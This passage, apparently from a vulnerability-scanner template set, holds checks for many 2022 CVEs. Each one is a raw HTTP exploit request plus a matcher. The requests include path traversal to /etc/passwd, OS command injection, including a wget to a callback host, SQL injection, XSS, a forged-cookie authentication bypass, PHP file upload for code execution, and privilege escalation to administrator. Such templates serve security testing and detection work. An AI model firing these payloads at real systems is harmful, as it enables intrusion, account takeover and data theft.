/templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40881","info":{"name":"SolarView 6.00 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /network_test.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nhost=%0a{{cmd}}%0a&command=ping\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38794","info":{"name":"Zaver - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2599","info":{"name":"WordPress Anti-Malware Security and Brute-Force Firewall <4.21.83 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=<%2Fscript><img+src+onerror%3Dalert%28document.domain%29> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","GOTMLS_mt"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0189","info":{"name":"WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nid=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29298","info":{"name":"SolarView Compact 6.00 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24990","info":{"name":"TerraMaster TOS < 4.2.30 Server Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/api.php?mobile/webNasIPS"],"headers":{"User-Agent":"TNAS"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","TerraMaster"],"condition":"and"},{"type":"regex","part":"body","regex":["webNasIPS successful","(ADDR|(IFC|PWD|[DS]AT)):","\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-27984","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nmenu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"components/menu/classes/functions.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-0349","info":{"name":"WordPress NotificationX <2.3.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /?rest_route=/notificationx/v1/analytics HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnx_id=sleep(6) -- x\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"data\\\":{\\\"success\\\":true}\")"],"condition":"and"}]}]},{"id":"CVE-2022-22972","info":{"name":"VMware Workspace ONE Access/Identity Manager/vRealize Automation - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /vcac/ HTTP/1.1\nHost: {{Hostname}}\n","GET /vcac/?original_uri={{RootURL}}%2Fvcac HTTP/1.1\nHost: {{Hostname}}\n","POST /SAAS/auth/login/embeddedauthbroker/callback HTTP/1.1\nHost: {{interactsh-url}}\nContent-type: application/x-www-form-urlencoded\n\nprotected_state={{protected_state}}&userstore={{userstore}}&username=administrator&password=horizon&userstoreDisplay={{userstoreDisplay}}&horizonRelayState={{horizonRelayState}}&stickyConnectorId={{stickyConnectorId}}&action=Sign+in\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["HZN="]},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","name":"protected_state","group":1,"regex":["id=\"protected_state\" value=\"([a-zA-Z0-9]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"horizonRelayState","group":1,"regex":["name=\"horizonRelayState\" value=\"([a-z0-9-]+)\"\\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstore","group":1,"regex":["id=\"userstore\" value=\"([a-z.]+)\" \\/>"],"internal":true,"part":"body"},{"type":"regex","name":"userstoreDisplay","group":1,"regex":["id=\"userstoreDisplay\" readonly class=\"login-input transparent_class\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"regex","name":"stickyConnectorId","group":1,"regex":["name=\"stickyConnectorId\" value=\"(.*)\"/>"],"internal":true,"part":"body"},{"type":"kval","name":"HZN-Cookie","kval":["HZN"],"part":"header"}]}]},{"id":"CVE-2022-0148","info":{"name":"WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`) x\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42096","info":{"name":"Backdrop CMS version 1.23.0 - Cross Site Scripting (Stored)","severity":"medium"},"requests":[{"raw":["GET /?q=user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pass={{password}}&form_build_id={{form_id_1}}&form_id=user_login&op=Log+in\n","GET /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\n","POST /?q=node/add/post HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIubltUxssi0yqDjp\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"title\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_tags[und]\"\n\n{{randstr}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][summary]\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][value]\"\n\n<img src=x onerror=alert(document.domain)>\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"body[und][0][format]\"\n\nfull_html\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"files[field_image_und_0]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][fid]\"\n\n0\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"field_image[und][0][display]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"changed\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_build_id\"\n\n{{form_id_1}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_token\"\n\n{{form_token}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"form_id\"\n\n{{form_id_2}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"status\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[date]\"\n\n2023-04-25\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"scheduled[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"promote\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"name\"\n\n{{name}}\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[date]\"\n\n2023-04-24\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"date[time]\"\n\n16:59:23\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"path[auto]\"\n\n1\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"comment\"\n\n2\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"additional_settings__active_tab\"\n\n\n------WebKitFormBoundaryIubltUxssi0yqDjp\nContent-Disposition: form-data; name=\"op\"\n\nSave\n------WebKitFormBoundaryIubltUxssi0yqDjp--\n","GET /?q=posts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=\"x\" onerror=\"alert(document.domain)\" />","Backdrop CMS"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"form_id_1","group":1,"regex":["name=\"form_build_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"name","group":1,"regex":["name=\"name\" value=\"(.*?)\""],"internal":true},{"type":"regex","name":"form_id_2","group":1,"regex":["name=\"form_id\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"form_token","group":1,"regex":["name=\"form_token\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2022-46020","info":{"name":"WBCE CMS v1.5.4 -  Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login\n","GET /admin/settings/index.php?advanced=yes HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/settings/save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nadvanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=\n","POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"reqid\"\n\ntest\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php\n\necho md5(\"CVE-2022-46020\");\n\n?>\n\n-----------------------------213974337328367932543216511988\nContent-Disposition: form-data; name=\"mtime[]\"\n\ntest\n-----------------------------213974337328367932543216511988--\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_6","words":["751a8ba516522786d551075a092a7a84"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"username_fieldname","group":1,"regex":["name=\"username_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"password_fieldname","group":1,"regex":["name=\"password_fieldname\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"formtoken","group":1,"regex":["name=\"formtoken\" value=\"(.*)\""],"internal":true,"part":"body"},{"type":"regex","name":"app_name","group":1,"regex":["name=\"app_name\" value=\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0288","info":{"name":"WordPress Ad Inserter <2.7.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"body":"html_element_selection=</script><img+src+onerror=alert(document.domain)>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><img src onerror=alert(document.domain)>","ad-inserter"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1946","info":{"name":"WordPress Gallery <2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wpdevar_gall_img_url_h[<script>alert(document.domain)</script>]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23131","info":{"name":"Zabbix - SAML SSO Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/zabbix/index_sso.php","{{BaseURL}}/index_sso.php"],"stop-at-first-match":true,"headers":{"Cookie":"zbx_session=eyJzYW1sX2RhdGEiOnsidXNlcm5hbWVfYXR0cmlidXRlIjoiQWRtaW4ifSwic2Vzc2lvbmlkIjoiIiwic2lnbiI6IiJ9"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(header), 'location: zabbix.php?action=dashboard.view')"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2022-43164","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-27849","info":{"name":"WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Chat Log\"","\"User IP\"","\"User ID\""],"condition":"and"},{"type":"word","part":"header","words":["text/csv"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0679","info":{"name":"WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=narnoo_distributor_lib_request&lib_path=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2486","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-43167","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date=\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-28955","info":{"name":"D-Link DIR-816L - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/category_view.php","{{BaseURL}}/folder_view.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>SharePort Web Access</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1724","info":{"name":"WordPress Simple Membership <4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>\","]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38467","info":{"name":"CRM Perks Forms < 1.1.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=<img%20src%20onerror=alert(document.domain)>&LastName=<img%20src%20onerror=alert(document.domain)>&%20Company=<img%20src%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(content_type_2, \"text/html\")","contains(body_1, \"CRM Perks Forms\") && contains(body_2, \"<img src onerror=alert(document.domain)>\")"],"condition":"and"}]}]},{"id":"CVE-2022-46934","info":{"name":"kkFileView 4.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/picturesPreview?currentUrl=aHR0cDovLyIpO2FsZXJ0KGRvY3VtZW50LmRvbWFpbik7Ly8=&urls"],"matchers-condition":"and","matchers":[{"type":"word","words":["document.getElementById(\"http://\");alert(document.domain);//\").click();","viewer.min.css"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25485","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertLightbox.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21587","info":{"name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\nM=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\nM,BTR,34X-R([\"G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI=\"`P.PH*4$L!`A0#\nM%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````\"XN+RXN\nM+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R\nG:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n`\nend\n------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n","GET /OA_CGI/FNDWRR.exe HTTP/1.1\nHost: {{Hostname}}\n","POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;`I02P$\"%`,4``````!M<#16DP;7,@$````!````0P``````````\nM````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5\"4RUA\nM<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`\n(``!B````````\n`\nend\n"],"matchers":[{"type":"word","part":"body_2","words":["Nuclei-CVE-2022-21587"]}]}]},{"id":"CVE-2022-37191","info":{"name":"Cuppa CMS v1.0 - Authenticated Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\nfunction=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","part":"body_3","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["<td class='td_key'>(.*?)</td>"],"internal":true}]}]},{"id":"CVE-2022-22954","info":{"name":"VMware Workspace ONE Access - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Authorization context is not valid"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2022-24681","info":{"name":"ManageEngine ADSelfService Plus <6121 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /servlet/GetProductVersion HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(buildnumber, '< 6121')"]},{"type":"word","part":"body","words":["ManageEngine"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"buildnumber","group":1,"regex":["\"BUILD_NUMBER\":\"([0-9]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0968","info":{"name":"Microweber <1.2.12 - Integer Overflow","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/view:modules/load_module:users/edit-user:2 HTTP/1.1\nHost: {{Hostname}}\n","POST /api/user/2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nthumbnail=&id=2&token={{form_token}}&_method=PATCH&username={{user}}&verify_password=&first_name={{payload}}&last_name=test&email={{email}}&phone=&is_admin=0&is_active=1&basic_mode=0&api_key=\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3,'\\\"first_name\\\":\\\"{{payload}}\\\"')","status_code_3==200","contains(header_3,\"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"token\" value=\"(.*)\" autocomplete=\"off\">"],"internal":true,"part":"body"},{"type":"regex","name":"user","group":1,"regex":["<input type=\"text\" class=\"form-control\" name=\"username\" value=\"(.*)\">"],"internal":true,"part":"body"},{"type":"regex","name":"email","group":1,"regex":["<input type=\"email\" class=\"form-control\" name=\"email\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-32429","info":{"name":"MSNSwitch Firmware MNT.2408 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin-hax/ExportSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SSID1"]},{"type":"regex","part":"header","regex":["filename=\"Settings(.*).dat","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0952","info":{"name":"WordPress Sitemap by click5 <1.0.36 - Missing Authorization","severity":"high"},"requests":[{"raw":["POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"1\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"default_role\":\"administrator\"}\n","POST /wp-json/click5_sitemap/API/update_html_option_AJAX HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/json;charset=UTF-8\n\n{\"users_can_register\":\"0\"}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header, \"application/json\")","status_code == 200","contains(body_1, 'users_can_register')","contains(body_2, 'default_role')"],"condition":"and"}]}]},{"id":"CVE-2022-42746","info":{"name":"CandidATS 3.0.0 - Cross-Site 